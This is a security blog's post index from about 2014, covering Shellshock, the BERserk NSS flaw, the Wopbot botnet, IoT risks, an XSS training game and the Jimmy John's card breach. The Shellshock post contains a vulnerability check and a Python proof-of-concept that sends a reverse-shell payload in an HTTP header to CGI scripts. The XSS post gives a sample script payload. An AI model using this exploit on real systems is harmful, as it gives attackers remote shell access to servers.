8 Year Old Gets Shell Access

The bar has been raised and set. Zero cool from the movie “Hackers” was 11. This 8 year old got shell access during a live demo.

Posted in Security Blog | Tagged , , , , , | Comments Off on 8 Year Old Gets Shell Access

XSS Games

xssgame

Test your h4cking skillz with the XSS Game at https://xss-game.appspot.com/.

Hint the first answer is: <script>alert(“XSS”);</script>

Posted in Security Blog | Tagged , , , , , , , , | Comments Off on XSS Games

BERserk Vulnerability

chrome-firefox

If you use FireFox or Chrome as a web browser, it is time to update them. The Mozilla Network Security Services (NSS) crypto library, a collection of cryptographic algorithms used for a variety of Internet standards currently allows for attackers to forge RSA signatures. RSA is a method of encryption that helps ensure that your data is transmitted securely across the Web. If you see a website marked with “https://,”.

Sites that we think are secure might not be so secure after all. This means that if you’re shopping or banking on a website that uses SSL (or “https://”), your personal information could be exposed.

https://www.mozilla.org/en-US/firefox/new/
http://googlechromereleases.blogspot.com/2014/09/stable-channel-update_24.html

Posted in Security Blog | Tagged , , , , , | Comments Off on BERserk Vulnerability

Black Hat. Hacking. Explosions. Thor?

In a world of global cybercrime, Legendary’s Blackhat follows a furloughed convict and his American and Chinese partners as they hunt a high-level cybercrime network from Chicago to Los Angeles to Hong Kong to Jakarta.

Posted in Security Blog | Tagged , | Comments Off on Black Hat. Hacking. Explosions. Thor?

WOPBOT BotNet

A botnet runs on Linux and Linux variant servers, named wopbot that uses the Bash Shellshock bug to auto-infect others. The wopbot botnet is active and scanning the internet for vulnerable systems, including network ranges at the United States Department of Defense. The US DoD network in question is the 215.0.0.0/8 range, with approximately 16.7 million addresses.

Apache web servers around the world could be at risk if their common gateway interface (CGI) scripts invoke Bash. Every operating system below, with the exception of the Windows OS, needs to be evaluated for the Shellshock bug.

Capture

 

Wopbot is a command and control malware botnet. It zombifies targets and allows them to be used in Distributed Denial of Service (DDoS) attacks.

INFOGRAPHIC: Shellshock

Posted in Security Blog | Tagged , , , , , , , , , , | Comments Off on WOPBOT BotNet

Many IoT devices run embedded Linux distributions with Bash

I’m not trying to perform a Chicken Little, but outside of corporate data centers, where the average home owner with some cool computerized toys who doesn’t perform regular updates, is very vulnerable and prone to privacy loss. Some devices are subject to abuse.
infosecchickenlittle

  • Here are some items in the modern house that could be running the bash shell.
  • Bluetooth/NFC door locks.
  • Home thermostat
  • Home security systems
  • Baby monitors
  • Smart Fridges

Some of these items can be exploited. Doors unlocked, thermostats messed with at all hours of the day or night. Video feed from Internet connected cameras from security systems and baby monitors put onto a website open to the public. See article Lights, Camera, Hacktion, which can lead to literal nightmares.

The smart fridges have more capability though, leading to stronger types of exploits and abuse that could place an individual into an investigation, and even slander them. Smart fridges that are vulnerable, have been used in the past to perform spam and phishing attacks, See article The Internet of Things. Since they are more robust, they can be more vulnerable. Though I can’t confirm if the fridges are running bash, but they are vulnerable to user configurations… especially if they don’t get patched. What if someone used a fridge in a spam attack. No big deal for a consumer. They patch and move on. But what if destructive malware was uploaded? Or the fridge was converted into a piracy server? Even worse, what if it turns into a Child Pornography server?

Possible ramifications to the fridge owner can deal with public humiliation and spending time on reputation repair.

A lot of this post is speculation, but I strongly believe that these threats can be realized. Bash being exploitable is very dangerous and proper measures should be taken.

Posted in Security Blog | Tagged , , , , | Comments Off on Many IoT devices run embedded Linux distributions with Bash

Old Android Browser, iOS8, & Home Depot


I love these 60 second updates by Sophos.

Posted in Security Blog | Tagged , , , , , , | Comments Off on Old Android Browser, iOS8, & Home Depot

Palo Verde Nuclear Generating Station Evacuated

Palo_Verde_site_55

MCSO: Palo Verde building evacuated after bomb threat

A building at the Palo Verde Nuclear Generating Station was evacuated Wednesday after a bomb threat, authorities said.
Check out this story on azcentral.com: http://azc.cc/1pdN5ES

It was just a threat.

Posted in Security Blog | Tagged , , | Comments Off on Palo Verde Nuclear Generating Station Evacuated

BASH (Bourne-Again SHell) ShellShock Bug

bash-icone1

Stephane Chazelas, IT Manager at SeeByte, discovered a vulnerability in bash, related to how environment variables are processed: trailing code in function definitions was executed, independent of the variable name.

For those unknowing, Bash is a command processor, typically run in a text window, allowing the user to type commands which cause actions. Bash can also read commands from a file, called a script. Like all Unix shells, it supports filename wildcarding, piping, here documents, command substitution, variables and control structures for condition-testing and iteration. The keywords, syntax and other basic features of the language were all copied from sh. Other features, e.g., history, were copied from csh (C Shell), and ksh (Korn Shell). Bash is a POSIX shell but with a number of extensions.

The name itself is an acronym, a pun, and a description. As an acronym, it stands for Bourne-again shell, referring to its objective as a free replacement for the Bourne shell. As a pun, it expressed that objective in a phrase that sounds similar to born again, a term for spiritual rebirth. The name is also descriptive of what it did, bashing together the features of sh, csh (C Shell), and ksh (Korn Shell)

A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.

Description of bash from Wikipedia!

How to Check
To determine if a Linux or Unix system is vulnerable, run the following command lines in your Linux shell:
env X="() { :;} ; echo ThisSystemIsVulnerable" /bin/sh -c "echo completed"

if it returns the word ThisSystemIsVulnerable… then you are vulnerable.

Proof of Concept Code
#
#CVE-2014-6271 cgi-bin reverse shell
#

import httplib,urllib,sys

if (len(sys.argv)<4):
print "Usage: %s " % sys.argv[0]
print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
"test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data

shellshock-bug-ft

Posted in Security Blog | Tagged , , , , , , , | Comments Off on BASH (Bourne-Again SHell) ShellShock Bug

Jimmy John’s

Jimmy John’s announced that they had a data security breach on their website

jjdb

“Approximately 216 stores appear to have been affected by this event,” Jimmy John’s said in the statement. “Cards impacted by this event appear to be those swiped at the stores, and did not include those cards entered manually or online. The credit and debit card information at issue may include the card number and in some cases the cardholder’s name, verification code, and/or the card’s expiration date. Information entered online, such as customer address, email, and password, remains secure.”

There are more than 1,900 franchised Jimmy John’s locations across the United States, meaning this breach impacted roughly 11 percent of all stores.

The statement from Jimmy John’s doesn’t name the point of sale vendor, but company officials confirm that the point-of-sale vendor that was compromised was indeed Signature Systems. Officials from Signature Systems could not be immediately reached for comment, and it remains unclear if other companies that use its point-of-sale solutions may have been similarly impacted.

Posted in Security Blog | Tagged , , , , , | Comments Off on Jimmy John’s